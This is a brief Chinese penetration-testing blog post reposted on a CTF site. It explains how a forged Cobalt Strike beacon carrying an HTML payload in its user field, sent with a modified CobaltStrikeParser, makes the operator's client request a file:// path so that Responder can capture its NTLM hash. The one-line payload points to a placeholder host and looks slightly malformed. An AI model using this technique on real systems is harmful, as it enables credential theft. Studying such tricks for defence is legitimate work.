CTF导航 CTF导航

CobaltStrike XSS利用新姿势

渗透技巧 2年前 (2022) admin
616 0 0

Jas502n大佬的思路

CobaltStrike XSS利用新姿势



使用此工具建立监听:https://github.com/lgandx/Responder

CobaltStrike XSS利用新姿势


https://github.com/Sentinel-One/CobaltStrikeParser/

修改 comm.py39行,为payload<html>< img src=’file://x.x.x.x/xx’%>

CobaltStrike XSS利用新姿势

CobaltStrike XSS利用新姿势

伪造上线

CobaltStrike XSS利用新姿势


CS上线,user 处为我们设置的 payload

CobaltStrike XSS利用新姿势


Responder 脚本抓到客户机 hash

CobaltStrike XSS利用新姿势


原文始发于微信公众号(刨洞技术交流):CobaltStrike XSS利用新姿势

版权声明:admin 发表于 2022年9月23日 下午4:14。
转载请注明:CobaltStrike XSS利用新姿势 | CTF导航

相关文章

CS4.5完全和谐版,支持自定义水印
admin
1,341
基于智能手机的近源渗透案例分享 —— 极深研几
admin
788
内网凭证东搜西罗
admin
1,139
VMWare最新勒索事件“态势感知”
admin
474
DLL injection–LOLBIN
admin
863
某网络设备RCE漏洞(附EXP)
admin
197

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

Boolean-based SQL Injection in ZoneMinder v1.37.* <= 1.37.64
0
Open-Source Intelligence Summit 2024议题慢递
0
NTLM Relaying – Making the Old New Again
0
每日安全动态推送(24/11/4)
0
wuzhicms<=4.1.0后台RCE(0day)
0
每周蓝军技术推送(2024.10.26-11.1)
0
Apache Solr漏洞CVE-2024-45216分析
0
某小型cms漏洞复现审计
0
Distributed RPC Framework RemoteModule has Deserialization RCE in pytorch/pytorch(CVE-2024-48063)
0
JWT(JSON Web Token) 攻击面小结
0